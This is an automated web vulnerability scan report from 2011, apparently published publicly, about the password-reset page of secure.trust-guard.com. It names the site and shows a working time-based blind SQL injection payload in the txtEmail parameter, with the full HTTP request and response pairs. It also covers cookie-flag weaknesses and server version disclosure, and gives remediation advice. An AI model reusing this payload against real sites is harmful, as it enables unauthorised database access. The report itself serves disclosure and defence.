GHDB, DORK, SQL Injection, Database Error, CWE-89, CAPEC-66 Report of secure.trust-guard.com REPORT SUMMARY

Netsparker - Scan Report Summary

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Private Reporting of Security Research is preferred for Online Service Providers

Loading
TARGET URL
 https://secure.trust-guard.com/ResetPassword....
SCAN DATE
 4/25/2011 1:00:12 PM
REPORT DATE
 4/25/2011 3:58:52 PM
SCAN DURATION
 00:02:51

Total Requests

113

Average Speed

0.66 req/sec.
5
identified
4
confirmed
1
critical
1
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Blind SQL Injection
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
20 %
IMPORTANT
20 %
LOW
40 %
INFORMATION
20 %

VULNERABILITY SUMMARY

Vulnerability Summary
XSS in secure.trust-guard.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86 XSS in secure.trust-guard.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86 Step #2: Follow the Redirection XSS in secure.trust-guard.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86 Step #3 - Confirm the Application response. Blind SQL Injection will be a form of unexpected response that can be measured and reported. The actual HTTP Request and Response Pairs can be found at URL http://xss.cx/2011/04/25/txt/blind-sql-injection-proof-of-concept-application-response-securetrustguardcom.txt and a complete report via Netsparker 1.9.0.5 can be found at URL http://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm. XSS in secure.trust-guard.com, DORK, Cross Site Scripting, CWE-79, CAPEC-86
URL Parameter Method Vulnerability Confirmed
/ResetPassword.php txtEmail POST Blind SQL Injection Yes
Cookie Not Marked As Secure Yes
Cookie Not Marked As HttpOnly Yes
Apache Version Disclosure No
MySQL Database Identified Yes
Blind SQL Injection

Blind SQL Injection
1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /ResetPassword.php

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Parameters

Parameter Type Value
btnCancel POST Cancel
btnSubmit POST Submit
txtEmail POST -111' OR SLEEP(25)=0 LIMIT 1--

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Content-Length: 84
Expect: 100-continue
Accept-Encoding: gzip, deflate

btnCancel=Cancel&btnSubmit=Submit&txtEmail=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 18:01:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200
Location: index.php
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Cookie Not Marked As Secure

Cookie Not Marked As Secure
1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /ResetPassword.php

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Identified Cookie

PHPSESSID

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=sjhj47er2168q391qsf989a724; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/javascript" src="/formval.js"></script>
<script type="text/javascript" src="/main.js"></script>

<style type="text/css">
@import url(/main.css);
@import url(/formval.css);
</style>
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="" style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' ></span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEmail'),'msg_email');" />
<input id='btnCancel' name='btnCancel' type="submit" value="Cancel" />

</form>

</div>

</center>
<br /><br />
</td>
</tr>
<tr><td colspan="2" style="height: 50px; background-color: #4b924b">
<div align=center><font class="footer"><br />
<span style="color: #ffffff">
&copy; 2006 - 2011 <a href="http://trust-guard.com" class="footer" target="_blank">Trust Guard</a>
- A Global Marketing Strategies company.&nbsp;All Rights Reserved. <br> <a href="http://www.trust-guard.com/PCI-Scanning-s/39.htm" class="footer">PCI Scanning</a> and <a href="http://www.trust-guard.com/PCI-Compliance-s/65.htm" class="footer">PCI Compliance</a>
powered by Clone Guard |

<a rel="nofollow" href="http://www.trust-guard.com/articles.asp?ID=7" class="footer" target="_blank">Partner Opportunities</a> |
<a rel="nofollow" href="https://support.trust-guard.com" class="footer" target="_blank">Help</a> |
<a rel="nofollow" href="http://www.trust-guard.com/terms.asp" class="footer" target="_blank">Terms of Use</a>
<br>
</span>
</font><br /></div>
</td></tr>
</table>
<br />
<br />
<div align=center><font class="footer">&nbsp;




</font></div>
</center>
</div>

<div id="modalBackground"></div>

</body>
</html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /ResetPassword.php

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Identified Cookie

PHPSESSID

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=sjhj47er2168q391qsf989a724; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/javascript" src="/formval.js"></script>
<script type="text/javascript" src="/main.js"></script>

<style type="text/css">
@import url(/main.css);
@import url(/formval.css);
</style>
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="" style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' ></span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEmail'),'msg_email');" />
<input id='btnCancel' name='btnCancel' type="submit" value="Cancel" />

</form>

</div>

</center>
<br /><br />
</td>
</tr>
<tr><td colspan="2" style="height: 50px; background-color: #4b924b">
<div align=center><font class="footer"><br />
<span style="color: #ffffff">
&copy; 2006 - 2011 <a href="http://trust-guard.com" class="footer" target="_blank">Trust Guard</a>
- A Global Marketing Strategies company.&nbsp;All Rights Reserved. <br> <a href="http://www.trust-guard.com/PCI-Scanning-s/39.htm" class="footer">PCI Scanning</a> and <a href="http://www.trust-guard.com/PCI-Compliance-s/65.htm" class="footer">PCI Compliance</a>
powered by Clone Guard |

<a rel="nofollow" href="http://www.trust-guard.com/articles.asp?ID=7" class="footer" target="_blank">Partner Opportunities</a> |
<a rel="nofollow" href="https://support.trust-guard.com" class="footer" target="_blank">Help</a> |
<a rel="nofollow" href="http://www.trust-guard.com/terms.asp" class="footer" target="_blank">Terms of Use</a>
<br>
</span>
</font><br /></div>
</td></tr>
</table>
<br />
<br />
<div align=center><font class="footer">&nbsp;




</font></div>
</center>
</div>

<div id="modalBackground"></div>

</body>
</html>
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /ResetPassword.php

/ResetPassword.php

https://secure.trust-guard.com/ResetPassword.php

Extracted Version

2.2.3 (CentOS)

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=sjhj47er2168q391qsf989a724; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/javascript" src="/formval.js"></script>
<script type="text/javascript" src="/main.js"></script>

<style type="text/css">
@import url(/main.css);
@import url(/formval.css);
</style>
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="" style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' ></span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEmail'),'msg_email');" />
<input id='btnCancel' name='btnCancel' type="submit" value="Cancel" />

</form>

</div>

</center>
<br /><br />
</td>
</tr>
<tr><td colspan="2" style="height: 50px; background-color: #4b924b">
<div align=center><font class="footer"><br />
<span style="color: #ffffff">
&copy; 2006 - 2011 <a href="http://trust-guard.com" class="footer" target="_blank">Trust Guard</a>
- A Global Marketing Strategies company.&nbsp;All Rights Reserved. <br> <a href="http://www.trust-guard.com/PCI-Scanning-s/39.htm" class="footer">PCI Scanning</a> and <a href="http://www.trust-guard.com/PCI-Compliance-s/65.htm" class="footer">PCI Compliance</a>
powered by Clone Guard |

<a rel="nofollow" href="http://www.trust-guard.com/articles.asp?ID=7" class="footer" target="_blank">Partner Opportunities</a> |
<a rel="nofollow" href="https://support.trust-guard.com" class="footer" target="_blank">Help</a> |
<a rel="nofollow" href="http://www.trust-guard.com/terms.asp" class="footer" target="_blank">Terms of Use</a>
<br>
</span>
</font><br /></div>
</td></tr>
</table>
<br />
<br />
<div align=center><font class="footer">&nbsp;




</font></div>
</center>
</div>

<div id="modalBackground"></div>

</body>
</html>
MySQL Database Identified

MySQL Database Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /ResetPassword.php

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Content-Length: 84
Expect: 100-continue
Accept-Encoding: gzip, deflate

btnCancel=Cancel&btnSubmit=Submit&txtEmail=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 18:01:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200
Location: index.php
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8